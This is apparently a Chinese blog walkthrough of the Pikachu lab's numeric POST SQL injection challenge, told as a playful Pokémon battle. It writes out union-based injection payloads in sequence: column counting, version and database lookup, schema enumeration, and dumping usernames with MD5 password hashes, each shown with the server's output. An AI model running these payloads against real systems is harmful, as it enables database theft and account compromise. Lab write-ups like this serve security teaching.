Pikachu 漏洞練習平臺Sql Injection數(shù)字型注入(post)通關指南pika~pika~

Sql Inject(SQL注入)概述(CTRL+C+V來的)
哦,SQL注入漏洞,可怕的漏洞。
在owasp發(fā)布的top10排行榜里,注入漏洞一直是危害排名第一的漏洞,其中注入漏洞里面首當其沖的就是數(shù)據(jù)庫注入漏洞。
? ? ? ? ? ? ? ? ? ? ? ?一個嚴重的SQL注入漏洞,可能會直接導致一家公司破產!
?SQL注入漏洞主要形成的原因是在數(shù)據(jù)交互中,前端的數(shù)據(jù)傳入到后臺處理時,沒有做嚴格的判斷,導致其傳入的“數(shù)據(jù)”拼接到SQL語句中后,被當作SQL語句的一部分執(zhí)行。 ? ? ? 從而導致數(shù)據(jù)庫受損(被脫褲、被刪除、甚至整個服務器權限淪陷)。
? ? ? ? ? ? ? ? ? ?在構建代碼時,一般會從如下幾個方面的策略來防止SQL注入漏洞:
1.對傳進SQL語句里面的變量進行過濾,不允許危險字符傳入;
2.使用參數(shù)化(Parameterized Query 或 Parameterized Statement);
3.還有就是,目前有很多ORM框架會自動使用參數(shù)化解決注入問題,但其也提供了"拼接"的方式,所以使用時需要慎重!- ? ? ? ? ? ? ? ? ? ?
SQL注入在網絡上非常熱門,也有很多技術專家寫過非常詳細的關于SQL注入漏洞的文章,這里就不在多寫了。
你可以通過“Sql Inject”對應的測試欄目,來進一步的了解該漏洞。? ? ?? ? ? ? ? ? ? ?

我反手就是一個開啟burp抓包,當然也可以用postman

選擇1,查詢!

觀察數(shù)據(jù)包,id=1就決定注入點是你了!上吧!!

Yukito對數(shù)據(jù)包使用了Send to Repeater!

面對Yukito的Send to Repeater!,服務器的回應是:
hello,vince
your email is: vince@pikachu.com
服務器的回合!
pika~pika~
服務器對Yukito使出了賣萌技能!什么都沒有發(fā)生!
Yukito的回合!

Yukito對服務器使用了id=1-1!
面對Yukito的id=1-1!服務器的回應是!
您輸入的user id不存在,請重新輸入!
服務器的回合!
pika~pika~
服務器對Yukito使出了賣萌技能!什么都沒有發(fā)生!
Yukito的回合!

Yukito對服務器使用了id=1 order by 3#!效果拔群!!
面對Yukito的id=1 order by 3#!服務器的回應是!
Unknown column '3' in 'order clause'!
服務器的回合!
pika~pika~
服務器對Yukito使出了賣萌技能!什么都沒有發(fā)生!
Yukito的回合!

Yukito對服務器使用了id=1 union select version(),database()#!效果拔群!!
面對Yukito的id=1 union select version(),database()#!服務器的回應是!
hello,vince
?your email is: vince@pikachu.com?class='notice'
hello,5.7.26
your email is: pikachu!
服務器的回合!
pika~pika~
服務器對Yukito使出了賣萌技能!什么都沒有發(fā)生!
Yukito的回合!

Yukito對服務器使用了id=1 union select 1,table_name from information_schema.tables where table_schema =database()#!效果拔群??!
面對Yukito的id=1 union select 1,table_name from information_schema.tables where table_schema =database()#!服務器的回應是!
hello,vince?
your email is: vince@pikachu.com
hello,1?
your email is: httpinfo
hello,1
your email is: member
hello,1?
your email is: message
hello,1?
your email is: users
hello,1?
your email is: xssblind
服務器的回合!
pika~pika~
服務器對Yukito使出了賣萌技能!什么都沒有發(fā)生!
Yukito的回合!

Yukito對服務器使用了id=1 union select 1,column_name from information_schema.columns where table_name ="users"#!效果拔群?。?/span>
面對Yukito的id=1 union select 1,column_name from information_schema.columns where table_name ="users"#!服務器的回應是!
hello,vince
your email is: vince@pikachu.com
hello,1
your email is: user_id
hello,1?
your email is: first_name
hello,1?
your email is: last_name
hello,1?
your email is: user
hello,1
your email is: password
hello,1
your email is: avatar
hello,1
your email is: last_login
hello,1?
your email is: failed_login
hello,1?
your email is: CURRENT_CONNECTIONS
hello,1
your email is: TOTAL_CONNECTIONS
hello,1?
your email is: id
hello,1?
your email is: username
hello,1?
your email is: level
服務器的回合!
pika~pika~
服務器對Yukito使出了賣萌技能!什么都沒有發(fā)生!
Yukito的回合!

Yukito對服務器使用了id=1 union select username,password from users#!效果拔群!!
面對Yukito的id=1 union select username,password from users#!服務器的回應是!
hello,vince?
your email is: vince@pikachu.com
hello,admin?
your email is: e10adc3949ba59abbe56e057f20f883e
hello,pikachu?
your email is: 670b14728ad9902aecba32e22fa4f6bd
hello,test
your email is: e99a18c428cb38d5f260853678922e03
服務器倒下了!
Yukito獲得了勝利!
不光是burp一個工具可以使用,我們來看postman的表現(xiàn)!
